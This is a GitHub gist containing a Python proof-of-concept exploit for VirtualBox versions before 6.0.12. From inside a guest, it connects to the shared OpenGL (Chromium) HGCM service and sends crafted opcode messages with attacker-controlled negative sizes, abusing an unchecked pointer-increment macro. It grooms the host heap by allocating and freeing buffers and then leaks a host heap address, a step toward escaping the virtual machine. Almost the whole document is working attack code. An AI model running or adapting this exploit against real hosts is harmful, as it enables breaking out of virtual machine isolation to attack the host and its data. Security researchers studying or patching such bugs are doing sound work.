Last active
November 13, 2025 01:16
-
-
Save peternguyen93/73a9558386935696086823b66a17d026 to your computer and use it in GitHub Desktop.
Revisions
-
peternguyen93 revised this gist
Sep 18, 2019 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,3 +1,5 @@ # Author : peternguyen93 import sys sys.path.append('../') # back to vboxlib module -
Sep 18, 2019 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,77 @@ import sys sys.path.append('../') # back to vboxlib module from vboxlib.hgcm import * from vboxlib.chromium import * from ctypes import * ''' Affect VirtualBox version < 6.0.12 ./VirtualBox/src/VBox/GuestHost/OpenGL/include/cr_unpack.h --------------------------------------------------------------------- #define INCR_DATA_PTR( delta ) \ cr_unpackData += (delta) #define INCR_VAR_PTR() \ INCR_DATA_PTR( *((int *) cr_unpackData ) ) --------------------------------------------------------------------- ''' op2 = b'' op2+= pack('<I', 0x28) # size opcode (we control) op2+= pack('<I',CR_GETUNIFORMLOCATION_EXTEND_OPCODE) op2+= pack('<I', 0x1000) # size (n) op2+= b'A'*4 # padding # op1 = pack('<B', CR_EXTEND_OPCODE) op1 = b'' op1+= pack('<I', c_uint32(-0x2050).value) # size opcode (we control) op1+= pack('<I', CR_GETATTRIBSLOCATIONS_EXTEND_OPCODE) op1+= pack('<II', 48, 64) op1+= b'A'*0x20 msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header msg+= pack('<I', 2) # number of opcode msg+= b'\x00'*2 # padding msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE) msg+= op1 msg = msg.ljust(4096, b'X') tmp_msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header tmp_msg+= pack('<I', 1) # number of opcode tmp_msg+= b'\x00'*2 # padding tmp_msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE) tmp_msg+= op1 tmp_msg+= op2*((4096 - len(tmp_msg)) // len(op2)) tmp_msg = tmp_msg.ljust(4096, b'P') client = hgcm_connect('VBoxSharedCrOpenGL') set_version(client) client1 = hgcm_connect('VBoxSharedCrOpenGL') set_version(client1) buf1 = alloc_buf(client, 0x1000, tmp_msg) buf2 = alloc_buf(client, 0x1000, tmp_msg) # free this buf3 = alloc_buf(client, 0x1000, tmp_msg) # free this buf4 = alloc_buf(client, 0x1000, tmp_msg) # msg extend goes here print('free buf4') msg_dispatch(client, buf4) # free buf4 print('alloc buf4') buf5 = alloc_buf(client1, 0x1000, msg) # locale in the last of heap print('free buf3') msg_dispatch(client, buf3) print('free buf2') msg_dispatch(client, buf2) print('execute buf5') res = msg_dispatch(client1, buf5) print(repr(res)[:64]) heap_address = unpack('<Q', res[8:16])[0] print('heap:', hex(heap_address)) hgcm_disconnect(client) hgcm_disconnect(client1)